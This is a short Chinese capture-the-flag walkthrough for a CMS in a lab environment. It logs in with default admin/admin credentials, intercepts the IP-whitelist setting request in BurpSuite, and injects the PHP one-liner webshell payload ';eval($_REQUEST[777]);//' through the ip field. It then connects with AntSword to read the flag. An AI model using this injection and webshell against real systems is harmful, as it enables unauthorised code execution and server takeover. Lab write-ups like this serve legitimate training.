开启环境
访问80端口的映射端口,进入cms
进入后台http://10.9.47.6:15704/manager/
通过账号密码:admin/admin 进行登录
成功进入后台
找到 系统--后台IP 安全设置
输入IP:127.0.0.1,点击确定,即可提交信息。
此处需要BurpSuite 进行数据包拦截。
机会只有一次(如果失败的话,需要重新启动环境)
开启拦截
拦截到数据包
修改数据包,注入一句话木马
v=0&ip=+127.0.0.1";eval($_REQUEST[777]);//
上数据包提交到服务器,Forward提交
找到上传的数据包,发送到Repeater模块
直接访问文件;
路径为:http://10.9.47.6:15704//manager/admin_ip.php
尝试传参
成功,一句话木马已经传入服务器
中国蚁剑连接
连接成功
在/tmp 文件下找到flag
完成!!